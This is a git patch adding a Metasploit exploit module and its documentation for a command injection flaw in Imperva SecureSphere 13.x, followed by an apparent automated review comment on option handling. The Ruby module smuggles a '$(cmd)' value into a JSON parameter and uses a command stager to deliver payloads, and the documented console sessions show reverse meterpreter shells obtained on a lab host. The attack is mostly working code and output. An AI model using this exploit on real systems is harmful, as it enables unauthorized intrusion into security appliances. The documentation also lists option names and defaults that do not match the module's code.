From db25dc7148c757d2bd6ff5ad5076bbb4cbbd5ab9 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Tue, 5 Mar 2019 21:52:13 -0600
Subject: [PATCH] Land #11210, imperva_securesphere_exec exploit

---
 .../linux/http/imperva_securesphere_exec.md | 205 ++++++++++++++++++
 .../linux/http/imperva_securesphere_exec.rb | 143 ++++++++++++
 2 files changed, 348 insertions(+)
 create mode 100644 documentation/modules/exploit/linux/http/imperva_securesphere_exec.md
 create mode 100644 modules/exploits/linux/http/imperva_securesphere_exec.rb

diff --git a/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md b/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md
new file mode 100644
index 0000000000..604d84315f
--- /dev/null
+++ b/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md
@@ -0,0 +1,205 @@
+## Description
+
+This module exploits a command injection vulnerability in Imperva SecureSphere 13.x. The vulnerability exists in the PWS service, where Python CGIs didn't properly sanitize user supplied command parameters and directly passes them to corresponding CLI utility, leading to command injection. Agent registration credential is required to exploit SecureSphere in gateway mode.
+
+## Vulnerable Application
+
+Imperva SecureSphere 13.0/13.1/13.2
+
+## Verification Steps
+
+1. `use exploit/linux/http/imperva_securesphere_exec`
+2. `set RHOST [TARGET IP]`
+3. `set PASS [Agent registration password]` if the target has been set to gateway mode
+4. Run `check`
+5. Verify that the result is `The target is vulnerable.`
+6. `set payload linux/x64/meterpreter/reverse_tcp`
+7. `set LHOST [IP]`
+8. Run `exploit`
+9. Verify that the reverse shell is obtained
+
+## Scenarios
+
+Imperva Secure 13.0 Pre-FTL mode:
+```
+msf5 > use exploit/linux/http/imperva_securesphere_exec
+msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201
+RHOST => 192.168.146.201
+msf5 exploit(linux/http/imperva_securesphere_exec) > check
+[+] 192.168.146.201:443 The target is vulnerable.
+msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
+LHOST => 192.168.146.215
+msf5 exploit(linux/http/imperva_securesphere_exec) > show options
+
+Module options (exploit/linux/http/imperva_securesphere_exec):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ PASS no Agent registration password
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS 192.168.146.201 yes The target address range or CIDR identifier
+ RPORT 443 yes The target port (TCP)
+ SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
+ SRVPORT 8080 yes The local port to listen on.
+ SSL true no Use SSL
+ SSLCert no Path to a custom SSL certificate (default is randomly generated)
+ TARGETURI /pws/impcli no The URI path to impcli
+ TIMEOUT 3 no HTTP connection timeout
+ URIPATH no The URI to use for this exploit (default is random)
+ USER imperva no Agent registration username
+ VHOST no HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ LHOST 192.168.146.215 yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+Exploit target:
+
+ Id Name
+ -- ----
+ 0 Imperva SecureSphere 13.0/13.1/13.2
+
+
+msf5 exploit(linux/http/imperva_securesphere_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.146.215:4444
+[*] Sending payload linux/x64/meterpreter/reverse_tcp
+[*] Sending stage (816260 bytes) to 192.168.146.201
+[*] Command Stager progress - 100.00% done (1321/1321 bytes)
+
+meterpreter > sysinfo
+Computer : localhost.localdomain
+OS : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64)
+Architecture : x64
+BuildTuple : x86_64-linux-musl
+Meterpreter : x64/linux
+meterpreter > shell
+Process 4965 created.
+Channel 1 created.
+id
+uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
+/sbin/ifconfig
+eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:50:99
+ inet addr:192.168.146.201 Bcast:192.168.146.255 Mask:255.255.255.0
+ inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
+ UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
+ RX packets:1331 errors:0 dropped:0 overruns:0 frame:0
+ TX packets:825 errors:0 dropped:0 overruns:0 carrier:0
+ collisions:0 txqueuelen:1000
+ RX bytes:1790319 (1.7 MiB) TX bytes:83116 (81.1 KiB)
+
+lo Link encap:Local Loopback
+ inet addr:127.0.0.1 Mask:255.0.0.0
+ inet6 addr: ::1/128 Scope:Host
+ UP LOOPBACK RUNNING MTU:16436 Metric:1
+ RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+ TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+ collisions:0 txqueuelen:0
+ RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
+
+exit
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.146.201 - Meterpreter session 1 closed. Reason: User exit
+```
+
+Imperva SecureSphere 13.0 Gateway mode (Requires agent registration credential):
+```
+msf5 > use exploit/linux/http/imperva_securesphere_exec
+msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201
+RHOST => 192.168.146.201
+msf5 exploit(linux/http/imperva_securesphere_exec) > set PASS lshy5782%lsLS
+PASS => lshy5782%lsLS
+msf5 exploit(linux/http/imperva_securesphere_exec) > check
+[+] 192.168.146.201:443 The target is vulnerable.
+msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
+LHOST => 192.168.146.215
+msf5 exploit(linux/http/imperva_securesphere_exec) > show options
+
+Module options (exploit/linux/http/imperva_securesphere_exec):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ PASS lshy5782%lsLS no Agent registration password
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS 192.168.146.201 yes The target address range or CIDR identifier
+ RPORT 443 yes The target port (TCP)
+ SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
+ SRVPORT 8080 yes The local port to listen on.
+ SSL true no Use SSL
+ SSLCert no Path to a custom SSL certificate (default is randomly generated)
+ TARGETURI /pws/impcli no The URI path to impcli
+ TIMEOUT 3 no HTTP connection timeout
+ URIPATH no The URI to use for this exploit (default is random)
+ USER imperva no Agent registration username
+ VHOST no HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ LHOST 192.168.146.215 yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+Exploit target:
+
+ Id Name
+ -- ----
+ 0 Imperva SecureSphere 13.0/13.1/13.2
+
+
+msf5 exploit(linux/http/imperva_securesphere_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.146.215:4444
+[*] Sending payload linux/x64/meterpreter/reverse_tcp
+[*] Sending stage (816260 bytes) to 192.168.146.201
+[*] Command Stager progress - 100.00% done (1321/1321 bytes)
+
+meterpreter > sysinfo
+Computer : 192.168.146.201
+OS : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64)
+Architecture : x64
+BuildTuple : x86_64-linux-musl
+Meterpreter : x64/linux
+meterpreter > shell
+Process 19634 created.
+Channel 1 created.
+id
+uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
+/sbin/ifconfig
+eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:50:99
+ inet addr:192.168.146.201 Bcast:192.168.146.255 Mask:255.255.255.0
+ inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
+ UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
+ RX packets:651 errors:0 dropped:0 overruns:0 frame:0
+ TX packets:451 errors:0 dropped:0 overruns:0 carrier:0
+ collisions:0 txqueuelen:1000
+ RX bytes:894174 (873.2 KiB) TX bytes:37181 (36.3 KiB)
+
+lo Link encap:Local Loopback
+ inet addr:127.0.0.1 Mask:255.0.0.0
+ inet6 addr: ::1/128 Scope:Host
+ UP LOOPBACK RUNNING MTU:16436 Metric:1
+ RX packets:153 errors:0 dropped:0 overruns:0 frame:0
+ TX packets:153 errors:0 dropped:0 overruns:0 carrier:0
+ collisions:0 txqueuelen:0
+ RX bytes:21579 (21.0 KiB) TX bytes:21579 (21.0 KiB)
+
+exit
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.146.201 - Meterpreter session 1 closed. Reason: User exit
+```
diff --git a/modules/exploits/linux/http/imperva_securesphere_exec.rb b/modules/exploits/linux/http/imperva_securesphere_exec.rb
new file mode 100644
index 0000000000..0a27d11d30
--- /dev/null
+++ b/modules/exploits/linux/http/imperva_securesphere_exec.rb
@@ -0,0 +1,143 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Imperva SecureSphere PWS Command Injection',
+ 'Description' => %q(
+ This module exploits a command injection vulnerability in Imperva
+ SecureSphere 13.x. The vulnerability exists in the PWS service,
+ where Python CGIs didn't properly sanitize user supplied command
+ parameters and directly passes them to corresponding CLI utility,
+ leading to command injection. Agent registration credential is
+ required to exploit SecureSphere in gateway mode.
+
+ This module was successfully tested on Imperva SecureSphere 13.0/13.1/
+ 13.2 in pre-ftl mode and unsealed gateway mode.
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'rsp3ar gmail.com>' # Discovery/Metasploit Module
+ ],
+ 'References' =>
+ [
+ [ 'EDB', '45542' ]
+ ],
+ 'DisclosureDate' => "Oct 8 2018",
+ 'DefaultOptions' => {
+ 'SSL' => true,
+ 'PrependFork' => true,
+ },
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'CmdStagerFlavor' => %w{ echo printf wget },
+ 'Targets' =>
+ [
+ ['Imperva SecureSphere 13.0/13.1/13.2', {}]
+ ],
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ Opt::RPORT(443),
+ OptString.new('USERNAME', [true, 'Agent registration username', 'imperva']),
+ OptString.new('PASSWORD', [true, 'Agent registration password', '']),
+ OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']),
+ OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 15])
+ ])
+ register_advanced_options [
+ OptBool.new('ForceExploit', [false, 'Override check result', false])
+ ]
+ end
+
+ def check
+ begin
+ res = execute_command('id')
+ rescue => e
+ vprint_error("#{e}")
+ return CheckCode::Unknown
+ end
+
+ if res.body =~ /uid=\d+/
+ return CheckCode::Vulnerable
+ end
+
+ CheckCode::Safe
+ end
+
+ def exploit
+ unless CheckCode::Vulnerable == check
+ unless datastore['ForceExploit']
+ fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+ end
+ print_warning 'Target does not appear to be vulnerable'
+ end
+
+ print_status("Sending payload #{datastore['PAYLOAD']}")
+ execute_cmdstager
+ end
+
+ def execute_command(cmd, opts = {})
+ data = {
+ 'command' => 'impctl server status',
+ 'parameters' => {
+ 'broadcast' => true,
+ 'installer-address' => "127.0.0.1 $(#{cmd})"
+ }
+ }
+
+ res = send_request data
+
+ return unless res
+
+ if res.code == 401
+ fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required')
+ end
+
+ unless res.code == 406 && res.body.include?("impctl")
+ fail_with(Failure::Unknown, 'Server did not respond in an expected way')
+ end
+
+ res
+ end
+
+ def send_request(data)
+ req_params = {
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path),
+ 'data' => data.to_json
+ }
+
+ if datastore['USERNAME'] && datastore['PASSWORD']
+ unless @cookie
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri('/')
+ })
+ unless res
+ fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+ end
+
+ @cookie = res.get_cookies
+ end
+
+ req_params['cookie'] = @cookie
+ req_params['headers'] = {
+ 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+ }
+ end
+
+ send_request_cgi(req_params, datastore['TIMEOUT'])
+ end
+end
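Review bot: `OptString.new('PASSWORD', [true, 'Agent registration password', ''])` in `initialize` marks the password required while defaulting it to an empty string, even though the module description says the credential is only needed in gateway mode; if framework option validation rejects an empty required value, the pre-FTL scenario cannot run without setting a throwaway password, so this should be `[false, 'Agent registration password', '']`. Because both options carry defaults, `if datastore['USERNAME'] && datastore['PASSWORD']` in `send_request` is always true (an empty string is truthy in Ruby), so the cookie-priming GET and the Basic `Authorization` header are sent on every request regardless of mode; gating on `unless datastore['PASSWORD'].to_s.empty?` would make the credential genuinely optional. The bare `rescue => e` in `check` also appears to catch the exception `fail_with(Failure::NoAccess, ...)` raises on a 401, so a wrong credential is reported as `CheckCode::Unknown` with the explanation only printed under VERBOSE and, from `exploit`, as "Target is not vulnerable"; rescuing only transport errors (e.g. `rescue Rex::ConnectionError, Timeout::Error => e`) would let the NoAccess failure surface. The documentation file added in the same commit still lists `USER`, `PASS` and a `TIMEOUT` default of 3, which do not match the `USERNAME`/`PASSWORD` options and `TIMEOUT` default of 15 registered here.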